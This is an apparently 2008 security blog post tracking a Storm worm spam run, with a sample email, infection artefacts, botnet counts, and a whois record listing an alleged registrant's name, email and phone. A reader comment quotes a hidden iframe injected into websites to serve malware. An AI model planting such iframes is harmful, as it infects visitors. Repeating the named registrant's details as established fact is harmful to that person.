Storm - Fourth of July run

Stormworm (aka CME711/Peed/Peacomm), has recently modified their spam run to play on US Independence Day - July 4th.

The site offers fireworks.exe, and forces a binary download using some malicious javascript. Users should be cautioned to watch for pages that look similar to this:




Instead of the typical "you need to download the codec to play this video", the storm authors have decided to show some pretty colors on the screen, which may actually trick more users into downloading the malicious file. Hopefully many people in the US will be watching the real fireworks displays and this run will fizzle out.

An example email:

Received: from [133.230.190.105] (helo=ngr)
by izqfx with smtp (Exim 4.62 (FreeBSD))
id 1KEaiJ-0005Pc-6y; Fri, 4 Jul 2008 09:07:55 +0700
Message-ID: <486d8556.6010007@libertytax.com>
Date: Fri, 4 Jul 2008 09:05:10 +0700
From:
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
Received: from [133.230.190.105] (helo=ngr)
by izqfx with smtp (Exim 4.62 (FreeBSD))
id 1KEaiJ-0005Pc-6y; Fri, 4 Jul 2008 09:07:55 +0700
Message-ID: <486d8556.6010007@libertytax.com>
Date: Fri, 4 Jul 2008 09:05:10 +0700
From:
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: [redacted]
Subject: Celebrate the spirit of America
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Celebrations have already begun http://68[dot]72[dot]110[dot]46/

Subject: Celebrate the spirit of America
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Celebrations have already begun http://68[dot]72[dot]110[dot]46/

(. replaced with [dot] in the url for accidental click protection)

Fireworks.exe drops the peers list in C:\WINDOWS\msserv.config and the binary to C:\WINDOWS\msserv.exe. It also sets the NTP server to time.windows.com and time.nist.gov. If you use another time server, and suspect an infection - check HKLM/​System/​CurrentControlSet/​Services/​W32Time/​Parameters.

Additional information can be found at http://garwarner.blogspot.com/2008/07/storm-worm-salutes-our-nation-on-4th.html

Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the storm worm fastflux domains appears to not be privacy hidden. I'm unclear if this is a slip up or a setup, but its interesting!

Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327

Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change:)

The fallowing code was injected into 4 of my websites:
------------------------------------
\"<iframe src=\"http://kqfloat.xxxcom/ind.php\" alt=\"BYDLOSHKA\"
height=\"1\" width=\"1\"></iframe>\"
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, accept one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google i found this news article.

What tells me that the hack of my websites is part of this Storm Botneck.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.